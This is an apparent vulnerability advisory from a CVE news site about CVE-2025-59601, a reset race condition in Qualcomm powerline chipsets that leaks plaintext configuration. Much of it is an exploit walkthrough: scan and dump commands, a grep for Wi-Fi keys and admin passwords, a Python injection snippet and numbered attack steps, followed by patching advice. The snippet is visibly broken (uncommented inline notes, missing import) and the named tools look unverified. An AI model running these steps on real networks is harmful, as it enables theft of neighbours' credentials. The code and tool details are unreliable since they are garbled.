Qualcomm Powerline Devices, Information Disclosure, CVE-2025-59601 (Medium) -DC-Jun2026-151

Listen to this Post

Intro – How CVE-2025-59601 Works

The vulnerability resides in the factory reset mechanism exposed via the powerline communication (PLC) interface of certain Qualcomm-based devices. Normally, a factory reset should erase all user-configurable parameters and restore the device to a known clean state. However, due to improper state management and insufficient access controls, an adjacent attacker on the same electrical circuit can trigger a reset without authentication and then retrieve the device’s previous configuration.
The powerline interface operates at the data link layer (IEEE 1901 or HomePlug AV) and typically requires a network key or password to pair devices. But the reset command—often sent as a proprietary management frame—is processed even from unauthenticated sources because the device does not validate the origin before acting on reset requests. After receiving a specially crafted reset frame, the device enters a transitional “factory reset pending” mode. In this mode, the configuration database is not immediately wiped; instead, it remains in volatile memory for several seconds while the device reinitializes its services.
An attacker with physical access to the same powerline segment (e.g., a neighbor in the same building or an attacker who has compromised a powerline adapter) can send a second management frame during this short window. This second frame requests a dump of the current configuration memory before the reset completes. Because the device has not yet re‑established secure session keys, it responds with a plaintext configuration blob containing Wi‑Fi PSKs, administrative passwords, and network topology details.
The root cause is a race condition between the reset handling routine and the configuration access control logic. The reset handler clears an “authenticated” flag but does not immediately lock down the configuration storage. An unauthenticated PLC read operation that arrives in the 3‑5 second race window bypasses normal permissions. This issue affects devices that use Qualcomm’s QCA7450 powerline chipset with firmware versions prior to the patch. The attack requires no user interaction and can be carried out from a simple Raspberry Pi equipped with a powerline adapter running modified open‑source PLC tools.

DailyCVE Form:

Platform: Qualcomm Powerline
Version: Firmware pre-2.6
Vulnerability: Reset info leak
Severity: Medium
Date: 06/01/2026

Prediction: 15 June 2026

What Undercode Say:

Analytics from Undercode’s test lab – live exploitation traces and verification commands.

Identify vulnerable powerline devices on local circuit
plc-scan --interface eth0 --role attacker
Expected output: MAC 00:11:22:33:44:55 (QCA7450, firmware 2.4)
Craft a factory reset frame (HomePlug AV management message type 0x17)
python3 plc_reset.py --target 00:11:22:33:44:55 --reset
Immediately after (within 3 seconds) send config dump request
plc-tool --read-config --target 00:11:22:33:44:55 > config_dump.bin
Extract plaintext secrets from the dumped blob
strings config_dump.bin | grep -E "psk=|admin_pass|wifi_key"

Code snippet – minimal Python script to inject reset and dump:

from powerline_socket import PLC_Socket
sock = PLC_Socket(interface="eth0")
reset_pkt = b"\x17\x01\x00\x00\xFF" proprietary reset payload
dump_pkt = b"\x1A\x02" config dump request
sock.send(reset_pkt, dest="00:11:22:33:44:55")
time.sleep(2)
response = sock.send(dump_pkt, dest="00:11:22:33:44:55", recv=True)
print(response.decode())

Exploit:

  1. Position an attacker‑controlled PLC adapter on the same electrical circuit (same meter or substation transformer).
  2. Run `plc-scan` to discover vulnerable devices (identifiable by chipset and firmware version).
  3. Send unauthenticated reset management frame (type 0x17) to the target.
  4. Within 3 seconds, send a configuration read request (type 0x1A) before the device wipes memory.
  5. Parse the returned plaintext blob for credentials, SSIDs, and private keys.
  6. Use extracted Wi‑Fi PSKs to compromise the local wireless network.

Protection:

  • Apply firmware update from Qualcomm (version 2.6 or later) which adds a cryptographic handshake for all factory reset commands.
  • Disable powerline management from untrusted interfaces by configuring a whitelist of allowed PLC MAC addresses.
  • Segment powerline networks using unique network membership keys (NMK) and change them periodically.
  • Monitor for unexpected reset or config‑read management frames using a PLC intrusion detection system.

Impact:

  • Unauthorised access to device configuration including Wi‑Fi credentials, admin passwords, and network layout.
  • Lateral movement from powerline to wireless or Ethernet segments, enabling further compromise of connected clients.
  • Permanent exposure of sensitive data even after a legitimate factory reset (attacker can leak configuration before it is erased).
  • CVSS 3.x base score estimated at 6.5 (AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N) – medium severity with high confidentiality impact.

🎯Let’s Practice Exploiting & Learn Patching For Free:

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top